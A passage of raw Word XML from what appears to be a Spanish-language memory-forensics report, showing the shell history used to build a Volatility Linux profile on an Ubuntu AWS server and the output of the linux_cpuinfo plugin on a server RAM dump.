    <w:p w14:paraId="00FDCC2D"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WinXPSP2x64                         - A Profile for Windows XP SP2 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238E92D8" w14:textId="77777777" w:rsidR="00D52A79" w:rsidRPr="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WinXPSP2x86                         - A Profile for Windows XP SP2 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F6D8F0" w14:textId="77777777" w:rsidR="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WinXPSP3x86                         - A Profile for Windows XP SP3 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090303EF" w14:textId="0E5E1275" w:rsidR="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319BF449" w14:textId="5B3705FB" w:rsidR="00D52A79" w:rsidRDefault="00D52A79">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED5EF3" w14:textId="4A5C7D15" w:rsidR="00D52A79" w:rsidRPr="00C9562B" w:rsidRDefault="00075CA6" w:rsidP="00D52A79">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="_Ref155654021"/>
      <w:bookmarkStart w:id="175" w:name="_Toc155782530"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VI</w:t>
      </w:r>
      <w:r w:rsidR="004C5DDC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D52A79">
        <w:t>Historial del Virtual Ubuntu Server para generación de perfil.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w14:paraId="77651D6B" w14:textId="77777777" w:rsidR="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00D52A79"/>
    <w:p w14:paraId="1A9DF6DC" w14:textId="77777777" w:rsidR="00D52A79" w:rsidRPr="00C9562B" w:rsidRDefault="00D52A79" w:rsidP="00D52A79">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30896C99" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>history &gt; usb/historial.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B61CC" w14:textId="58E6FD1F" w:rsidR="00D52A79" w:rsidRPr="00C9562B" w:rsidRDefault="00D52A79" w:rsidP="00D52A79">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EADBFA4" w14:textId="77777777" w:rsidR="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00D52A79"/>
    <w:p w14:paraId="125F39C7" w14:textId="5B2B2727" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00520AAC">
        <w:t>Se ha guardado en el archivo `/home/jrodg85/usb/historial.txt` el siguiente historial de acciones de la consola:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E25E1" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="644ECFE0" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00C9562B" w:rsidRDefault="00520AAC" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0CFD9D" w14:textId="017D741F" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00520AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1  sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A4588"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 xml:space="preserve"> 2  sudo apt upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FA2F8C"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 xml:space="preserve"> 3  sudo apt install zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FEF017"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 xml:space="preserve"> 4  sudo apt install git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D8137"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 xml:space="preserve"> 5  sudo apt install make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C62F32C"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 xml:space="preserve"> 6  sudo apt install dwarfdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B17B0CF"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 xml:space="preserve"> 7  sudo apt-cache search linux-image | grep 4.15.0-1021-aws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6B62A"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 xml:space="preserve"> 8  sudo apt install linux-image-4.15.0-1021-aws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE72F3D"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 xml:space="preserve"> 9  sudo reboot now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C2A06"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10  uname -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5138D"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11  hostnamectl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBBED4C"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12  sudo apt install build-essential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8B7E16"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13  sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B70E709"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14  sudo apt install linux-headers-$(uname -r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155C2455"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15  sudo apt install python2.7 python2.7-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA7F1D"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16  sudo snap install curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611B31C8"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17  dpkg -l python2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B51B2F9"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18  curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384BFB2F"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19  sudo python2.7 get-pip.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F0164F"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20  sudo pip2.7 --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7694C58A"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21  git clone https://github.com/volatilityfoundation/volatility.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B2E1A"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22  sudo pip2.7 install distorm3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED475BB"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23  sudo pip2.7 list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B5826B"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24  sudo pip2.7 install yara-python==3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29590389"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25  sudo pip2.7 list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E96F3E"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26  sudo pip2.7 install pycrypto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D7A82"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27  sudo pip2.7 list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2131B707"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28  sudo pip2.7 install Pillow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B474D4E"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29  sudo pip2.7 list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D60EF"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30  sudo pip2.7 install openpyxl==2.6.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C8220"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31  sudo pip2.7 list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A88BC2C"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32  sudo pip2.7 install ujson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7C6D1"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33  sudo pip2.7 list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018309CF"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lastRenderedPageBreak/>
        <w:t>34  cd volatility/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C016D"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35  sudo python2.7 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F610F"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36  sudo python2.7 vol.py --info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EB2CBD"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37  cd tools/linux/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14203E45"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38  make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340192A4"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39  cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63728C"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40  cd ../..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712E3DF2"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41  lsb_release -si</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B6BFF"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42  uname -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3ACB82"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43  clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E2B12"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44  sudo zip linux$(lsb_release -si)_$(uname -r)_profile.zip /home/jrodg85/volatility/tools/linux/module.dwarf /boot/System.map-4.15.0-1021-aws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E71A25"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45  mkdir usb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E2D7A7"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46  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478162F"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47  sudo mount /dev/sdb usb/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7CDDB"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48  cp linuxUbuntu_4.15.0-1021-aws_profile.zip usb/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A14106" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>49  touch usb/historial.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFAB8F1" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>50  history &gt; usb/historial.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC470A" w14:textId="55685110" w:rsidR="00520AAC" w:rsidRPr="00C9562B" w:rsidRDefault="00520AAC" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69794CBA" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="22C9D988" w14:textId="63CA4DF6" w:rsidR="00182D42" w:rsidRDefault="00182D42">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="588741A5" w14:textId="07DA064B" w:rsidR="00182D42" w:rsidRPr="00C9562B" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_Ref155718713"/>
      <w:bookmarkStart w:id="177" w:name="_Toc155782531"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VII. Comando linux_cpuinfo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w14:paraId="631DB6F3" w14:textId="77777777" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00D52A79"/>
    <w:p w14:paraId="7D3C0259" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00C9562B" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF7BD5B" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D53EEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_cpuinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C41E72F" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00C9562B" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074EFF59" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF"/>
    <w:p w14:paraId="7CA6BAE4" w14:textId="077FB482" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>La respuesta de la consola ha sido la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235CBA8F" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3148526C" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00C9562B" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254637F" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D53EEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A79A859" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DEEC56A" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D53EEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Processor    Vendor           Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C346D" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C18713C" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D53EEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>------------ ---------------- -----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4081F" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BD0335" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D53EEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>0            GenuineIntel     Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12434109" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRPr="00C9562B" w:rsidRDefault="00D53EEF" w:rsidP="00D53EEF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5050A0" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="68D4F773" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="421F6846" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="1A8DBB85" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="4FCC8736" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="6CC9B14C" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="6E50A085" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="5B2C8968" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="5D1D91C4" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="5F04CFCF" w14:textId="77777777" w:rsidR="00D53EEF" w:rsidRDefault="00D53EEF" w:rsidP="00D52A79"/>
    <w:p w14:paraId="0742F908" w14:textId="2F585850" w:rsidR="00182D42" w:rsidRDefault="00182D42">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C82B14E" w14:textId="7EF1F631" w:rsidR="00182D42" w:rsidRPr="00C9562B" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Ref155718857"/>
      <w:bookmarkStart w:id="179" w:name="_Toc155782532"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VIII. Comando linux_banner.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w14:paraId="6B40B593" w14:textId="77777777" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00D52A79"/>
    <w:p w14:paraId="62679A59" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRPr="00C9562B" w:rsidRDefault="00CE15AE" w:rsidP="00CE15AE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
